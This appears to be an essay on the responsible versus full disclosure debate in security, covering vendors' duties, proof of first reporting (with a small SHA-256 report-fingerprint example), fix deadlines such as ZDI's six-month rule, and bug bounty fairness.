Leaving aside the introductory anecdote, “responsible disclosure” is an old debate, and there are many examples that have periodically reopened it. In short: by disclosing a vulnerability you attack online crime, in a way, right where it hurts most, devaluing a highly prized asset. Also, making any flaw public makes its prevention and detection far more widespread and therefore prevents future attacks. It could even “stop” attacks that were hypothetically being carried out using a flaw before the researcher made it public.

On the negative side, once it is public, other attackers add it to their arsenal and can exploit that vulnerability to launch new attacks. Then again, mass-scale attacks always come with much more varied and affordable defenses. Finally, it is also true that making flaws public speeds up the vendor’s fixing process.

“Full disclosure” doesn’t really eliminate the impact of a vulnerability; it transforms it: from a hypothetical exclusive use of the flaw on the black market, unnoticed and very dangerous, with very specific and valuable targets where a few attacks yield a high profit, to indiscriminate attacks that are, however, caught to a greater extent by detection systems.

Other responsibilities

Now that reward programs are fashionable, many companies have tried to encourage responsible disclosure by financially rewarding those who discover vulnerabilities and security problems. But it is worth remembering that, from the affected party’s position, new responsibilities arise too. It is very common to state, for example, that the discovery will be attributed to the first person who writes to the security team. But how is this proved? How could someone demonstrate that they sent an email describing a flaw or vulnerability before anyone else? Vendors could require PGP-signed, timestamped messages, or even free services such as eGarante, to report and certify the notices, but none seems to explicitly recommend their use. Companies offering rewards suggest, at best, encrypting communications, but for confidentiality rather than as proof of authorship.
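The core of the “first reporter” problem is binding a report to a claimed time in a way that can be verified later. As a minimal illustration of the hashing idea (the function name and record format are ours; a real scheme would use PGP signatures or an RFC 3161 timestamping authority, not a bare hash):

```python
import hashlib
import json

def report_fingerprint(report_text: str, timestamp: str) -> str:
    """Produce a deterministic digest binding a report to a claimed time.

    Publishing this digest (e.g. in the first email) lets the reporter
    later reveal the report and show it matches; it does not by itself
    prove *when* the digest was created, which is why third-party
    timestamping or signatures are needed in practice.
    """
    record = json.dumps({"report": report_text, "ts": timestamp},
                        sort_keys=True)
    return hashlib.sha256(record.encode("utf-8")).hexdigest()
```

Any change to either the report or the claimed timestamp yields a completely different digest, so the affected vendor could compare fingerprints instead of taking “someone reported it first” on faith.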

We must also consider the responsibility of fixing a vulnerability or flaw within a reasonable time. How long is acceptable? In August 2010, TippingPoint’s Zero Day Initiative, fed up with vulnerabilities that dragged on forever, imposed a new rule intended to pressure software vendors into fixing their flaws as soon as possible: if, six months after being privately notified of a security flaw, they had not fixed it, it would be made public. For trivial web flaws, like the one in our anecdote, even less time should be allowed. Which raises a new problem: is there any “fair” or responsible way of assessing the severity of a problem and, therefore, its economic value when rewarding it? With companies that act as intermediaries the price is more or less fixed, but in each company’s “private” bounty programs it can be a very subjective value.

Reward programs aim to reward researchers, to motivate them so that vulnerabilities leave the black-market circuit, and also to obtain an advanced “audit” at a price the company considers fair. They also aim to project the image of a responsible company that rewards the work of security professionals… but companies must be prepared to respond diligently and to act as professionally and responsibly as they demand of researchers, in order to keep up the image they want to project. If not, just ask Yahoo!, which in the middle of the year was ridiculed after offering $12.50 (redeemable for Yahoo!’s own products) to a company that discovered serious security problems in its network.

Sergio de los Santos